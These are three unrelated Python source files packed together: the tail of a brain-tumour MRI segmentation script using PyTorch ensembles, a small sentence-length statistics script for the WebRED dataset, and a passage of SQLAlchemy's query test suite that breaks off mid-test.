gt_volume = gt_data[case][gt_id], central_slice=random_slice, stack_depth=stack_depth, size = size,
rotate_angle = rotate_angle, rotate_axis = rotate_axis, flipLR = random_flip,
lower_threshold = 0, upper_threshold = flair_99_percent[case][image_idx]
)
images_t1ce, gt, nonzero = get_stack(axis=axis, volume=t1ce_data[case][image_idx],
gt_volume = gt_data[case][gt_id], central_slice=random_slice, stack_depth=stack_depth, size = size,
rotate_angle = rotate_angle, rotate_axis = rotate_axis, flipLR = random_flip,
lower_threshold = 0, upper_threshold = t1ce_99_percent[case][image_idx]
)
images_flair = (images_flair*scale[0])+shift[0]
images_t1 = (images_t1*scale[1])+shift[1]
images_t2 = (images_t2*scale[2])+shift[2]
images_t1ce = (images_t1ce*scale[3])+shift[3]
images = np.stack([images_flair, images_t1, images_t2, images_t1ce]).astype(np.float32)
masks = numpy.stack([numpy.isin(gt[2],labelset) for labelset in target_label_sets], axis =0).astype(np.float32)
bg = numpy.logical_not(numpy.isin(gt[2], [y for x in target_label_sets for y in x]))[np.newaxis].astype(np.float32)
nonzero_masks = nonzero[2].astype(np.float32)
return images, masks, bg, nonzero_masks
# Override to give PyTorch size of dataset
def __len__(self):
return self.length
class AugmentationSampler(object):
"""Wraps a sampler to yield a mini-batch of multiple indices with data augmentation parameters
Args:
sampler (Sampler): Base sampler.
batch_size (int): Size of mini-batch.
drop_last (bool): If ``True``, the sampler will drop the last batch if
its size would be less than ``batch_size``
Example:
>>> list(BatchSampler(range(10), batch_size=3, drop_last=False))
[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
>>> list(BatchSampler(range(10), batch_size=3, drop_last=True))
[[0, 1, 2], [3, 4, 5], [6, 7, 8]]
"""
def __init__(self, sampler, batch_size, iterations, drop_last=False):
if not isinstance(sampler, Sampler):
raise ValueError("sampler should be an instance of "
"torch.utils.data.Sampler, but got sampler={}"
.format(sampler))
if not isinstance(batch_size, _int_classes) or isinstance(batch_size, bool) or batch_size <= 0:
raise ValueError("batch_size should be a positive integeral value, "
"but got batch_size={}".format(batch_size))
if not isinstance(drop_last, bool):
raise ValueError("drop_last should be a boolean value, but got "
"drop_last={}".format(drop_last))
self.sampler = sampler
self.batch_size = batch_size
self.drop_last = drop_last
self.iterations = iterations
def __iter__(self):
batch = []
for y in range(self.iterations):
for idx in self.sampler:
random_masking = np.random.randint(2)
random_gt = np.random.choice([0, 3,4])
random_flip = np.random.choice([False, True])
rotate_axis = np.random.choice([0,1,2,None],p=[0.3,0.3,0.3,0.1])
shift = np.random.normal(0,0.5, 4)
scale = np.random.normal(1,0.2, 4)
if rotate_axis is not None:
rotate_angle = np.random.uniform(-15,15)
else:
rotate_angle = None
batch.append((idx, random_masking, random_gt, random_flip, rotate_axis, rotate_angle, shift, scale))
if len(batch) == self.batch_size:
yield batch
batch = []
if len(batch) > 0 and not self.drop_last:
yield batch
batch = []
def __len__(self):
if self.drop_last:
return (len(self.sampler) // self.batch_size)*self.iterations
else:
return ((len(self.sampler) + self.batch_size - 1) // self.batch_size)*self.iterations
def make_sampler(data_sample, label_must_be_present=2, fraction=0.9, num_samples=None):
datapoints = [[list(itertools.product([case],
[axis],
np.where(gt_nonempty_any[label_must_be_present][case][axis])[0])) for axis in [0,1,2]] for case in data_sample]
datapoints = [x for y in datapoints for x in y]
datapoints = [x for y in datapoints for x in y]
weights = [1-fraction]*len(datapoints)
datapoints_label = [[list(itertools.product([case],
[axis],
np.where(gt_nonempty_any[label_must_be_present][case][axis])[0])) for axis in [0,1,2]] for case in data_sample]
datapoints_label = [x for y in datapoints_label for x in y]
datapoints_label = [x for y in datapoints_label for x in y]
for idx, x in enumerate(datapoints):
if x in datapoints_label:
weights[idx]=fraction
if num_samples is None:
num_samples = len(datapoints_label)
subsample_loader = DataLoader(BrainData(datapoints), batch_sampler = AugmentationSampler(WeightedRandomSampler(weights, num_samples), batch_size=2, iterations = 1, drop_last=False),
num_workers=8,pin_memory=True)
return subsample_loader
# In[16]:
def load_checkpoint(net, checkpoint_file):
if os.path.isfile(checkpoint_file):
print("=> loading checkpoint '{}'".format(checkpoint_file))
checkpoint = torch.load(checkpoint_file)
net.load_state_dict(checkpoint['state_dict'])
def segment(flair, t1, t2, t1c, net1, net2):
assert(isinstance(flair, nib.nifti1.Nifti1Image))
flair_imgs = []
t2_imgs = []
t1ce_imgs = []
t1_imgs = []
flair_imgs.append(flair)
t2_imgs.append(t2)
t1_imgs.append(t1)
t1ce_imgs.append(t1c)
flair_data = [x.get_data().astype(np.float32) for x in flair_imgs]
t1_data = [x.get_data().astype(np.float32) for x in t1_imgs]
t2_data = [x.get_data() for x in t2_imgs]
t1ce_data = [x.get_data() for x in t1ce_imgs]
case=0
case_data = [flair_data[case],t1_data[case],t2_data[case],t1ce_data[case]]
mask = (t2_data[case]>0).astype(np.int)
full_image_0, full_mask_0, full_logit_0, full_flip_0, losses_0, vloss_0,TP_0,FP_0,TN_0,FN_0 = apply_to_case(net1,
case_data,
mask,5, axis=0)
print(".")
full_image_1, full_mask_1, full_logit_1, full_flip_1, losses_1, vloss_0,TP_1,FP_1,TN_1,FN_1 = apply_to_case(net1,
case_data,
mask,5, axis=1)
print(".")
full_image_2, full_mask_2, full_logit_2, full_flip_2, losses_2, vloss_0,TP_2,FP_2,TN_2,FN_2 = apply_to_case(net1,
case_data,
mask,5, axis=2)
print(".")
full_image_0, full_mask_0, full_logit_3, full_flip_3, losses_0, vloss_0,TP_0,FP_0,TN_0,FN_0 = apply_to_case(net2,
case_data,
mask,5, axis=0)
print(".")
full_image_1, full_mask_1, full_logit_4, full_flip_4, losses_1, vloss_0,TP_1,FP_1,TN_1,FN_1 = apply_to_case(net2,
case_data,
mask,5, axis=1)
print(".")
full_image_2, full_mask_2, full_logit_5, full_flip_5, losses_2, vloss_0,TP_2,FP_2,TN_2,FN_2 = apply_to_case(net2,
case_data,
mask,5, axis=2)
print(".")
full_var_0 = np.abs(full_logit_0/full_flip_0)
full_var_1 = np.abs(full_logit_1/full_flip_1)
full_var_2 = np.abs(full_logit_2/full_flip_2)
full_var_3 = np.abs(full_logit_3/full_flip_3)
full_var_4 = np.abs(full_logit_4/full_flip_4)
full_var_5 = np.abs(full_logit_5/full_flip_5)
full_var_denom = 1/(1/full_var_0 + 1/full_var_1 + 1/full_var_2 + 1/full_var_3 + 1/full_var_4 + 1/full_var_5)
full_var = full_var_denom
weighted_logit = (full_logit_0/full_var_0 + full_logit_1/full_var_1 + full_logit_2/full_var_2 +
full_logit_3/full_var_3 + full_logit_4/full_var_4 + full_logit_5/full_var_5)*full_var_denom
full_logit = (full_logit_0 + full_logit_1 + full_logit_2+full_logit_3 + full_logit_4 + full_logit_5)/6
seg_var_ensemble = numpy.any(numpy.stack([weighted_logit[4]>0, weighted_logit[3]>0, weighted_logit[2]>0,weighted_logit[1]>0, full_logit[0]>0]), axis = 0)
seg_var_ensemble = seg_var_ensemble*5
edema = numpy.any(numpy.stack([weighted_logit[3]>0, weighted_logit[2]>0,weighted_logit[1]>0, weighted_logit[0]>0]), axis = 0)
seg_var_ensemble[edema] = 2
core = numpy.any(numpy.stack([weighted_logit[2]>0,weighted_logit[1]>0, weighted_logit[0]>0]), axis = 0)
seg_var_ensemble[core] = 1
enhancing = np.logical_and(weighted_logit[1]>weighted_logit[0], core)
seg_var_ensemble[enhancing] = 4
flair_masked = flair_data[case]*(seg_var_ensemble>0).astype(np.int)
t1_masked = t1_data[case]*(seg_var_ensemble>0).astype(np.int)
t2_masked = t2_data[case]*(seg_var_ensemble>0).astype(np.int)
t1ce_masked = t1ce_data[case]*(seg_var_ensemble>0).astype(np.int)
case_data = [flair_masked,t1_masked,t2_masked,t1ce_masked]
mask = (t2_masked>0).astype(np.int)
full_image_0, full_mask_0, full_logit_6, full_flip_6, losses_0, vloss_0,TP_0,FP_0,TN_0,FN_0 = apply_to_case(net1,
case_data,
mask,5, axis=0)
print(".")
full_image_1, full_mask_1, full_logit_7, full_flip_7, losses_1, vloss_0,TP_1,FP_1,TN_1,FN_1 = apply_to_case(net1,
case_data,
mask,5, axis=1)
print(".")
full_image_2, full_mask_2, full_logit_8, full_flip_8, losses_2, vloss_0,TP_2,FP_2,TN_2,FN_2 = apply_to_case(net1,
case_data,
mask,5, axis=2)
print(".")
full_image_0, full_mask_0, full_logit_9, full_flip_9, losses_0, vloss_0,TP_0,FP_0,TN_0,FN_0 = apply_to_case(net2,
case_data,
mask,5, axis=0)
print(".")
full_image_1, full_mask_1, full_logit_10, full_flip_10, losses_1, vloss_0,TP_1,FP_1,TN_1,FN_1 = apply_to_case(net2,
case_data,
mask,5, axis=1)
print(".")
full_image_2, full_mask_2, full_logit_11, full_flip_11, losses_2, vloss_0,TP_2,FP_2,TN_2,FN_2 = apply_to_case(net2,
case_data,
mask,5, axis=2)
print(".")
full_var_6 = np.abs(full_logit_6/full_flip_6)
full_var_7 = np.abs(full_logit_7/full_flip_7)
full_var_8 = np.abs(full_logit_8/full_flip_8)
full_var_9 = np.abs(full_logit_9/full_flip_9)
full_var_10 = np.abs(full_logit_10/full_flip_10)
full_var_11 = np.abs(full_logit_11/full_flip_11)
full_var_denom = 1/(1/full_var_0 + 1/full_var_1 + 1/full_var_2 + 1/full_var_3 + 1/full_var_4 + 1/full_var_5+
1/full_var_6 + 1/full_var_7 + 1/full_var_8 + 1/full_var_9 + 1/full_var_10 + 1/full_var_11)
full_var = full_var_denom
weighted_logit = (full_logit_0/full_var_0 + full_logit_1/full_var_1 + full_logit_2/full_var_2 +
full_logit_3/full_var_3 + full_logit_4/full_var_4 + full_logit_5/full_var_5 +
full_logit_6/full_var_6 + full_logit_7/full_var_7 + full_logit_8/full_var_8 +
full_logit_9/full_var_9 + full_logit_10/full_var_10 + full_logit_11/full_var_11)*full_var_denom
full_logit = (full_logit_0 + full_logit_1 + full_logit_2+full_logit_3 + full_logit_4 + full_logit_5+
full_logit_6 + full_logit_7 + full_logit_8+full_logit_9 + full_logit_10 + full_logit_11)/12
seg_var_ensemble = numpy.any(numpy.stack([weighted_logit[4]>0, weighted_logit[3]>0, weighted_logit[2]>0,weighted_logit[1]>0, full_logit[0]>0]), axis = 0)
seg_var_ensemble = seg_var_ensemble*5
edema = numpy.any(numpy.stack([weighted_logit[3]>0, weighted_logit[2]>0,weighted_logit[1]>0, weighted_logit[0]>0]), axis = 0)
seg_var_ensemble[edema] = 2
core = numpy.any(numpy.stack([weighted_logit[2]>0,weighted_logit[1]>0, weighted_logit[0]>0]), axis = 0)
seg_var_ensemble[core] = 1
enhancing = np.logical_and(weighted_logit[1]>weighted_logit[0], core)
seg_var_ensemble[enhancing] = 4
brain_mask = (seg_var_ensemble>0).astype(np.int32)
seg_var_ensemble[seg_var_ensemble == 5] = 0
enhancing_vol = np.sum(seg_var_ensemble==4)
core_vol = np.sum(np.logical_or(seg_var_ensemble == 1, seg_var_ensemble == 4))
edema_vol = np.sum(seg_var_ensemble>0)
# In[225]:
if core_vol == 0:
edema = seg_var_ensemble >0
seg_var_ensemble[edema] = 1
from scipy import ndimage as ndi
label_objects, nb_labels = ndi.label(seg_var_ensemble>0)
if nb_labels > 1:
for n in range(nb_labels):
if np.sum(label_objects ==n+1) < 400:
seg_var_ensemble[label_objects == n+1] = 0
if edema_vol == 0:
seg_var_ensemble = (brain_mask * 2).astype(np.int32)
return seg_var_ensemble
|
"""
Author: Tong
Time: --2021
"""
import json
import numpy as np
with open("data/webred/webred_21.json", "r") as file_in:
original_data = json.load(file_in)
# process data into <x, y>
_pair_data = []
for item in original_data:
_pair_data.append([item['sentence'], item['relation_name']])
pass
len_ = []
for i, sent in enumerate(_pair_data):
len_.append(len(sent[0].split()))
len_ = np.array(len_)
length = len(len_)
print(np.max(len_))
print(np.size(len_))
print("200: ", float(len(np.where(len_>200)[0]) / length))
print("100: ", float(len(np.where(len_>100)[0]) / length))
print("80: ", float(len(np.where(len_>80)[0]) / length))
print("70: ", float(len(np.where(len_>70)[0]) / length))
print("60: ", float(len(np.where(len_>60)[0]) / length))
print("50: ", float(len(np.where(len_>50)[0]) / length))
|
from sqlalchemy.testing import eq_, assert_raises_message, assert_raises, \
is_, in_, not_in_
from sqlalchemy import testing
from sqlalchemy.testing import fixtures, engines
from sqlalchemy import util
from sqlalchemy import (
exc, sql, func, select, String, Integer, MetaData, and_, ForeignKey,
union, intersect, except_, union_all, VARCHAR, INT, CHAR, text, Sequence,
bindparam, literal, not_, type_coerce, literal_column, desc, asc,
TypeDecorator, or_, cast, table, column)
from sqlalchemy.engine import default, result as _result
from sqlalchemy.testing.schema import Table, Column
# ongoing - these are old tests. those which are of general use
# to test a dialect are being slowly migrated to
# sqlalhcemy.testing.suite
users = users2 = addresses = metadata = None
class QueryTest(fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
global users, users2, addresses, metadata
metadata = MetaData(testing.db)
users = Table(
'query_users', metadata,
Column(
'user_id', INT, primary_key=True,
test_needs_autoincrement=True),
Column('user_name', VARCHAR(20)),
test_needs_acid=True
)
addresses = Table(
'query_addresses', metadata,
Column(
'address_id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('user_id', Integer, ForeignKey('query_users.user_id')),
Column('address', String(30)),
test_needs_acid=True
)
users2 = Table(
'u2', metadata,
Column('user_id', INT, primary_key=True),
Column('user_name', VARCHAR(20)),
test_needs_acid=True
)
metadata.create_all()
@engines.close_first
def teardown(self):
addresses.delete().execute()
users.delete().execute()
users2.delete().execute()
@classmethod
def teardown_class(cls):
metadata.drop_all()
@testing.requires.multivalues_inserts
def test_multivalues_insert(self):
users.insert(
values=[
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'}]).execute()
rows = users.select().order_by(users.c.user_id).execute().fetchall()
self.assert_(rows[0] == (7, 'jack'))
self.assert_(rows[1] == (8, 'ed'))
users.insert(values=[(9, 'jack'), (10, 'ed')]).execute()
rows = users.select().order_by(users.c.user_id).execute().fetchall()
self.assert_(rows[2] == (9, 'jack'))
self.assert_(rows[3] == (10, 'ed'))
def test_insert_heterogeneous_params(self):
"""test that executemany parameters are asserted to match the
parameter set of the first."""
assert_raises_message(
exc.StatementError,
r"\(sqlalchemy.exc.InvalidRequestError\) A value is required for "
"bind parameter 'user_name', in "
"parameter group 2 "
r"\[SQL: u?'INSERT INTO query_users",
users.insert().execute,
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9}
)
# this succeeds however. We aren't yet doing
# a length check on all subsequent parameters.
users.insert().execute(
{'user_id': 7},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9}
)
def test_lastrow_accessor(self):
"""Tests the inserted_primary_key and lastrow_has_id() functions."""
def insert_values(engine, table, values):
"""
Inserts a row into a table, returns the full list of values
INSERTed including defaults that fired off on the DB side and
detects rows that had defaults and post-fetches.
"""
# verify implicit_returning is working
if engine.dialect.implicit_returning:
ins = table.insert()
comp = ins.compile(engine, column_keys=list(values))
if not set(values).issuperset(
c.key for c in table.primary_key):
assert comp.returning
result = engine.execute(table.insert(), **values)
ret = values.copy()
for col, id in zip(table.primary_key, result.inserted_primary_key):
ret[col.key] = id
if result.lastrow_has_defaults():
criterion = and_(
*[
col == id for col, id in
zip(table.primary_key, result.inserted_primary_key)])
row = engine.execute(table.select(criterion)).first()
for c in table.c:
ret[c.key] = row[c]
return ret
if testing.against('firebird', 'postgresql', 'oracle', 'mssql'):
assert testing.db.dialect.implicit_returning
if testing.db.dialect.implicit_returning:
test_engines = [
engines.testing_engine(options={'implicit_returning': False}),
engines.testing_engine(options={'implicit_returning': True}),
]
else:
test_engines = [testing.db]
for engine in test_engines:
metadata = MetaData()
for supported, table, values, assertvalues in [
(
{'unsupported': ['sqlite']},
Table(
"t1", metadata,
Column(
'id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('foo', String(30), primary_key=True)),
{'foo': 'hi'},
{'id': 1, 'foo': 'hi'}
),
(
{'unsupported': ['sqlite']},
Table(
"t2", metadata,
Column(
'id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('foo', String(30), primary_key=True),
Column('bar', String(30), server_default='hi')
),
{'foo': 'hi'},
{'id': 1, 'foo': 'hi', 'bar': 'hi'}
),
(
{'unsupported': []},
Table(
"t3", metadata,
Column("id", String(40), primary_key=True),
Column('foo', String(30), primary_key=True),
Column("bar", String(30))
),
{'id': 'hi', 'foo': 'thisisfoo', 'bar': "thisisbar"},
{'id': 'hi', 'foo': 'thisisfoo', 'bar': "thisisbar"}
),
(
{'unsupported': []},
Table(
"t4", metadata,
Column(
'id', Integer,
Sequence('t4_id_seq', optional=True),
primary_key=True),
Column('foo', String(30), primary_key=True),
Column('bar', String(30), server_default='hi')
),
{'foo': 'hi', 'id': 1},
{'id': 1, 'foo': 'hi', 'bar': 'hi'}
),
(
{'unsupported': []},
Table(
"t5", metadata,
Column('id', String(10), primary_key=True),
Column('bar', String(30), server_default='hi')
),
{'id': 'id1'},
{'id': 'id1', 'bar': 'hi'},
),
(
{'unsupported': ['sqlite']},
Table(
"t6", metadata,
Column(
'id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('bar', Integer, primary_key=True)
),
{'bar': 0},
{'id': 1, 'bar': 0},
),
]:
if testing.db.name in supported['unsupported']:
continue
try:
table.create(bind=engine, checkfirst=True)
i = insert_values(engine, table, values)
assert i == assertvalues, "tablename: %s %r %r" % \
(table.name, repr(i), repr(assertvalues))
finally:
table.drop(bind=engine)
# TODO: why not in the sqlite suite?
@testing.only_on('sqlite+pysqlite')
@testing.provide_metadata
def test_lastrowid_zero(self):
from sqlalchemy.dialects import sqlite
eng = engines.testing_engine()
class ExcCtx(sqlite.base.SQLiteExecutionContext):
def get_lastrowid(self):
return 0
eng.dialect.execution_ctx_cls = ExcCtx
t = Table(
't', self.metadata, Column('x', Integer, primary_key=True),
Column('y', Integer))
t.create(eng)
r = eng.execute(t.insert().values(y=5))
eq_(r.inserted_primary_key, [0])
@testing.fails_on(
'sqlite', "sqlite autoincremnt doesn't work with composite pks")
def test_misordered_lastrow(self):
related = Table(
'related', metadata,
Column('id', Integer, primary_key=True),
mysql_engine='MyISAM'
)
t6 = Table(
"t6", metadata,
Column(
'manual_id', Integer, ForeignKey('related.id'),
primary_key=True),
Column(
'auto_id', Integer, primary_key=True,
test_needs_autoincrement=True),
mysql_engine='MyISAM'
)
metadata.create_all()
r = related.insert().values(id=12).execute()
id = r.inserted_primary_key[0]
assert id == 12
r = t6.insert().values(manual_id=id).execute()
eq_(r.inserted_primary_key, [12, 1])
def test_implicit_id_insert_select_columns(self):
stmt = users.insert().from_select(
(users.c.user_id, users.c.user_name),
users.select().where(users.c.user_id == 20))
testing.db.execute(stmt)
def test_implicit_id_insert_select_keys(self):
stmt = users.insert().from_select(
["user_id", "user_name"],
users.select().where(users.c.user_id == 20))
testing.db.execute(stmt)
def test_row_iteration(self):
users.insert().execute(
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9, 'user_name': 'fred'},
)
r = users.select().execute()
l = []
for row in r:
l.append(row)
self.assert_(len(l) == 3)
@testing.requires.subqueries
def test_anonymous_rows(self):
users.insert().execute(
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9, 'user_name': 'fred'},
)
sel = select([users.c.user_id]).where(users.c.user_name == 'jack'). \
as_scalar()
for row in select([sel + 1, sel + 3], bind=users.bind).execute():
assert row['anon_1'] == 8
assert row['anon_2'] == 10
@testing.fails_on(
'firebird', "kinterbasdb doesn't send full type information")
def test_order_by_label(self):
"""test that a label within an ORDER BY works on each backend.
This test should be modified to support [ticket:1068] when that ticket
is implemented. For now, you need to put the actual string in the
ORDER BY.
"""
users.insert().execute(
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9, 'user_name': 'fred'},
)
concat = ("test: " + users.c.user_name).label('thedata')
eq_(
select([concat]).order_by("thedata").execute().fetchall(),
[("test: ed",), ("test: fred",), ("test: jack",)]
)
eq_(
select([concat]).order_by("thedata").execute().fetchall(),
[("test: ed",), ("test: fred",), ("test: jack",)]
)
concat = ("test: " + users.c.user_name).label('thedata')
eq_(
select([concat]).order_by(desc('thedata')).execute().fetchall(),
[("test: jack",), ("test: fred",), ("test: ed",)]
)
@testing.requires.order_by_label_with_expression
def test_order_by_label_compound(self):
users.insert().execute(
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9, 'user_name': 'fred'},
)
concat = ("test: " + users.c.user_name).label('thedata')
eq_(
select([concat]).order_by(literal_column('thedata') + "x").
execute().fetchall(),
[("test: ed",), ("test: fred",), ("test: jack",)]
)
def test_row_comparison(self):
users.insert().execute(user_id=7, user_name='jack')
rp = users.select().execute().first()
self.assert_(rp == rp)
self.assert_(not(rp != rp))
equal = (7, 'jack')
self.assert_(rp == equal)
self.assert_(equal == rp)
self.assert_(not (rp != equal))
self.assert_(not (equal != equal))
def endless():
while True:
yield 1
self.assert_(rp != endless())
self.assert_(endless() != rp)
# test that everything compares the same
# as it would against a tuple
import operator
for compare in [False, 8, endless(), 'xyz', (7, 'jack')]:
for op in [
operator.eq, operator.ne, operator.gt,
operator.lt, operator.ge, operator.le
]:
try:
control = op(equal, compare)
except TypeError:
# Py3K raises TypeError for some invalid comparisons
assert_raises(TypeError, op, rp, compare)
else:
eq_(control, op(rp, compare))
try:
control = op(compare, equal)
except TypeError:
# Py3K raises TypeError for some invalid comparisons
assert_raises(TypeError, op, compare, rp)
else:
eq_(control, op(compare, rp))
@testing.provide_metadata
def test_column_label_overlap_fallback(self):
content = Table(
'content', self.metadata,
Column('type', String(30)),
)
bar = Table(
'bar', self.metadata,
Column('content_type', String(30))
)
self.metadata.create_all(testing.db)
testing.db.execute(content.insert().values(type="t1"))
row = testing.db.execute(content.select(use_labels=True)).first()
assert content.c.type in row
assert bar.c.content_type not in row
assert sql.column('content_type') in row
row = testing.db.execute(
select([content.c.type.label("content_type")])).first()
assert content.c.type in row
assert bar.c.content_type not in row
assert sql.column('content_type') in row
row = testing.db.execute(select([func.now().label("content_type")])). \
first()
assert content.c.type not in row
assert bar.c.content_type not in row
assert sql.column('content_type') in row
def test_pickled_rows(self):
users.insert().execute(
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9, 'user_name': 'fred'},
)
for pickle in False, True:
for use_labels in False, True:
result = users.select(use_labels=use_labels).order_by(
users.c.user_id).execute().fetchall()
if pickle:
result = util.pickle.loads(util.pickle.dumps(result))
eq_(
result,
[(7, "jack"), (8, "ed"), (9, "fred")]
)
if use_labels:
eq_(result[0]['query_users_user_id'], 7)
eq_(
list(result[0].keys()),
["query_users_user_id", "query_users_user_name"])
else:
eq_(result[0]['user_id'], 7)
eq_(list(result[0].keys()), ["user_id", "user_name"])
eq_(result[0][0], 7)
eq_(result[0][users.c.user_id], 7)
eq_(result[0][users.c.user_name], 'jack')
if not pickle or use_labels:
assert_raises(
exc.NoSuchColumnError,
lambda: result[0][addresses.c.user_id])
else:
# test with a different table. name resolution is
# causing 'user_id' to match when use_labels wasn't used.
eq_(result[0][addresses.c.user_id], 7)
assert_raises(
exc.NoSuchColumnError, lambda: result[0]['fake key'])
assert_raises(
exc.NoSuchColumnError,
lambda: result[0][addresses.c.address_id])
def test_column_error_printing(self):
row = testing.db.execute(select([1])).first()
class unprintable(object):
def __str__(self):
raise ValueError("nope")
msg = r"Could not locate column in row for column '%s'"
for accessor, repl in [
("x", "x"),
(Column("q", Integer), "q"),
(Column("q", Integer) + 12, r"q \+ :q_1"),
(unprintable(), "unprintable element.*"),
]:
assert_raises_message(
exc.NoSuchColumnError,
msg % repl,
lambda: row[accessor]
)
@testing.requires.boolean_col_expressions
def test_or_and_as_columns(self):
true, false = literal(True), literal(False)
eq_(testing.db.execute(select([and_(true, false)])).scalar(), False)
eq_(testing.db.execute(select([and_(true, true)])).scalar(), True)
eq_(testing.db.execute(select([or_(true, false)])).scalar(), True)
eq_(testing.db.execute(select([or_(false, false)])).scalar(), False)
eq_(
testing.db.execute(select([not_(or_(false, false))])).scalar(),
True)
row = testing.db.execute(
select(
[or_(false, false).label("x"),
and_(true, false).label("y")])).first()
assert row.x == False # noqa
assert row.y == False # noqa
row = testing.db.execute(
select(
[or_(true, false).label("x"),
and_(true, false).label("y")])).first()
assert row.x == True # noqa
assert row.y == False # noqa
def test_fetchmany(self):
users.insert().execute(user_id=7, user_name='jack')
users.insert().execute(user_id=8, user_name='ed')
users.insert().execute(user_id=9, user_name='fred')
r = users.select().execute()
l = []
for row in r.fetchmany(size=2):
l.append(row)
self.assert_(len(l) == 2, "fetchmany(size=2) got %s rows" % len(l))
def test_like_ops(self):
users.insert().execute(
{'user_id': 1, 'user_name': 'apples'},
{'user_id': 2, 'user_name': 'oranges'},
{'user_id': 3, 'user_name': 'bananas'},
{'user_id': 4, 'user_name': 'legumes'},
{'user_id': 5, 'user_name': 'hi % there'},
)
for expr, result in (
(select([users.c.user_id]).
where(users.c.user_name.startswith('apple')), [(1,)]),
(select([users.c.user_id]).
where(users.c.user_name.contains('i % t')), [(5,)]),
(select([users.c.user_id]).
where(users.c.user_name.endswith('anas')), [(3,)]),
(select([users.c.user_id]).
where(users.c.user_name.contains('i % t', escape='&')),
[(5,)]),
):
eq_(expr.execute().fetchall(), result)
@testing.requires.mod_operator_as_percent_sign
@testing.emits_warning('.*now automatically escapes.*')
def test_percents_in_text(self):
for expr, result in (
(text("select 6 % 10"), 6),
(text("select 17 % 10"), 7),
(text("select '%'"), '%'),
(text("select '%%'"), '%%'),
(text("select '%%%'"), '%%%'),
(text("select 'hello % world'"), "hello % world")
):
eq_(testing.db.scalar(expr), result)
def test_ilike(self):
users.insert().execute(
{'user_id': 1, 'user_name': 'one'},
{'user_id': 2, 'user_name': 'TwO'},
{'user_id': 3, 'user_name': 'ONE'},
{'user_id': 4, 'user_name': 'OnE'},
)
eq_(
select([users.c.user_id]).where(users.c.user_name.ilike('one')).
execute().fetchall(), [(1, ), (3, ), (4, )])
eq_(
select([users.c.user_id]).where(users.c.user_name.ilike('TWO')).
execute().fetchall(), [(2, )])
if testing.against('postgresql'):
eq_(
select([users.c.user_id]).
where(users.c.user_name.like('one')).execute().fetchall(),
[(1, )])
eq_(
select([users.c.user_id]).
where(users.c.user_name.like('TWO')).execute().fetchall(), [])
def test_compiled_execute(self):
users.insert().execute(user_id=7, user_name='jack')
s = select([users], users.c.user_id == bindparam('id')).compile()
c = testing.db.connect()
assert c.execute(s, id=7).fetchall()[0]['user_id'] == 7
def test_compiled_insert_execute(self):
users.insert().compile().execute(user_id=7, user_name='jack')
s = select([users], users.c.user_id == bindparam('id')).compile()
c = testing.db.connect()
assert c.execute(s, id=7).fetchall()[0]['user_id'] == 7
def test_repeated_bindparams(self):
"""Tests that a BindParam can be used more than once.
This should be run for DB-APIs with both positional and named
paramstyles.
"""
users.insert().execute(user_id=7, user_name='jack')
users.insert().execute(user_id=8, user_name='fred')
u = bindparam('userid')
s = users.select(and_(users.c.user_name == u, users.c.user_name == u))
r = s.execute(userid='fred').fetchall()
assert len(r) == 1
def test_bindparam_detection(self):
dialect = default.DefaultDialect(paramstyle='qmark')
prep = lambda q: str(sql.text(q).compile(dialect=dialect))
def a_eq(got, wanted):
if got != wanted:
print("Wanted %s" % wanted)
print("Received %s" % got)
self.assert_(got == wanted, got)
a_eq(prep('select foo'), 'select foo')
a_eq(prep("time='12:30:00'"), "time='12:30:00'")
a_eq(prep("time='12:30:00'"), "time='12:30:00'")
a_eq(prep(":this:that"), ":this:that")
a_eq(prep(":this :that"), "? ?")
a_eq(prep("(:this),(:that :other)"), "(?),(? ?)")
a_eq(prep("(:this),(:that:other)"), "(?),(:that:other)")
a_eq(prep("(:this),(:that,:other)"), "(?),(?,?)")
a_eq(prep("(:that_:other)"), "(:that_:other)")
a_eq(prep("(:that_ :other)"), "(? ?)")
a_eq(prep("(:that_other)"), "(?)")
a_eq(prep("(:that$other)"), "(?)")
a_eq(prep("(:that$:other)"), "(:that$:other)")
a_eq(prep(".:that$ :other."), ".? ?.")
a_eq(prep(r'select \foo'), r'select \foo')
a_eq(prep(r"time='12\:30:00'"), r"time='12\:30:00'")
a_eq(prep(":this \:that"), "? :that")
a_eq(prep(r"(\:that$other)"), "(:that$other)")
a_eq(prep(r".\:that$ :other."), ".:that$ ?.")
@testing.requires.standalone_binds
def test_select_from_bindparam(self):
"""Test result row processing when selecting from a plain bind
param."""
class MyInteger(TypeDecorator):
impl = Integer
def process_bind_param(self, value, dialect):
return int(value[4:])
def process_result_value(self, value, dialect):
return "INT_%d" % value
eq_(
testing.db.scalar(select([cast("INT_5", type_=MyInteger)])),
"INT_5"
)
eq_(
testing.db.scalar(
select([cast("INT_5", type_=MyInteger).label('foo')])),
"INT_5"
)
def test_order_by(self):
"""Exercises ORDER BY clause generation.
Tests simple, compound, aliased and DESC clauses.
"""
users.insert().execute(user_id=1, user_name='c')
users.insert().execute(user_id=2, user_name='b')
users.insert().execute(user_id=3, user_name='a')
def a_eq(executable, wanted):
got = list(executable.execute())
eq_(got, wanted)
for labels in False, True:
a_eq(users.select(order_by=[users.c.user_id],
use_labels=labels),
[(1, 'c'), (2, 'b'), (3, 'a')])
a_eq(users.select(order_by=[users.c.user_name, users.c.user_id],
use_labels=labels),
[(3, 'a'), (2, 'b'), (1, 'c')])
a_eq(select([users.c.user_id.label('foo')],
use_labels=labels,
order_by=[users.c.user_id]),
[(1,), (2,), (3,)])
a_eq(select([users.c.user_id.label('foo'), users.c.user_name],
use_labels=labels,
